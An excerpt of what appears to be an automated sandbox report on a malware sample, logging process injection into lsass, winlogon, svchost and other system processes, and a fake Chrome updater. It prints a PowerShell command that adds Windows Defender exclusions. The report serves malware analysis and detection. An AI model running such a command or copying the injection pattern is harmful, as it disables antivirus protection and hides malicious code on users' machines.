Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000001CB338EB50C
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0000026E027CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0000026E027C7E70
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF1B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_000001C6CEF1B50C
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF17E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_000001C6CEF17E70
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000025304FBB50C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000025304FB7E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2116B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0000016C2116B50C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C21167E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0000016C21167E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0000016C211CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0000016C211C7E70
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F4814B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000026F4814B50C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F48147E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000026F48147E70
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B92347E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0000029B92347E70
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B9234B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0000029B9234B50C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0000029B923A7E70
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0000029B923AB50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0000020422AAB50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0000020422AA7E70
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00000206287B7E70
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00000206287BB50C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_0000028471397E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0000028471397E70
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847139B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002847139B50C
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001829254B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001829254B50C
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0000018292547E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0000018292547E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001BB3DA67E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001BB3DA6B50C
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0000029ABCF4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0000029ABCF47E70
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_0000025E81DD7E70
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_0000025E81DDB50C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD87E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000001CD9AD87E70
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD8B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000001CD9AD8B50C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C39B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_000002AF8C39B50C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C397E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_000002AF8C397E70

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 2EA8A660000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 1CB338B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26E02790000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1C6CEEE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25304F80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 16C21130000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26F47BD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29B91DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 204227B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20628780000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 182924D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB3D3C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29ABCEE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 2EA8A6E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 1CB33910000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26E033A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1C6CEF40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25305540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 16C21190000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26F48170000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29B92370000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20422AD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20628E80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 18292570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB3DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29ABCF10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD9AD50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2AF8C360000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 145854A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2CC6C080000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A6E9540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BC418A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19D14D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2251FF40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24CD3730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2259C5B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23504770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22903F80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2158FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FD855A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2995E1C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A880020000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: E60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E5EB130000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13949580000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 295CE1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2251A000000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2481AE30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2D0873D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 2527E340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20217280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26C3B960000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB42B30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19116860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28D05730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E30EAE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 238FF4E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D509FC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1DC06A00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15E4FFA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C4A5A70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 14D18D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23CDFD30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B7A1980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1A53D510000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E88D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 8EC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C72BA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 1CF2C040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2B555D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18EDC3D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 153541C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20B142B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 225E6D70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 195B0560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 219434A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2B118D70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F933320000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F9683C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1E47CB90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2673DA80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 21A21380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1CE44C00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 155B4770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 255FC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22D3F800000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471970000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3A67E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 25E81DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FC1A070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1AE13BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 21FBD160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20C8C170000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 5_2_00007FF67E6C1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

5_2_00007FF67E6C1DB4

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 8A662908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: 338B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2792908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: CEEE2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4F82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 21132908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 47BD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 91DD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 227B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 28782908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe EIP: 71252908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 924D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3D3C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8A6E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33912908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CEF42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5542908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 21192908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 48172908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 92372908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 22AD2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 28E82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 92572908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3DA92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BCF12908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9AD52908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 8C362908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 854A2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6C082908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E9542908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 418A2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 14D02908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1FF42908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3732908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9C5B2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4772908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3F82908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 8FFB2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 855A2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5E1C2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 80022908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: E62908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EB132908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 49582908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CE1B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1A002908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1AE32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 873D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7E342908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 17282908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B962908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 42B32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 16862908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5732908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EAE2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FF4E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9FC2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6A02908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4FFA2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A5A72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 18D62908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DFD32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A1982908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3D512908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 88D42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8EC2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 72BA2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C042908
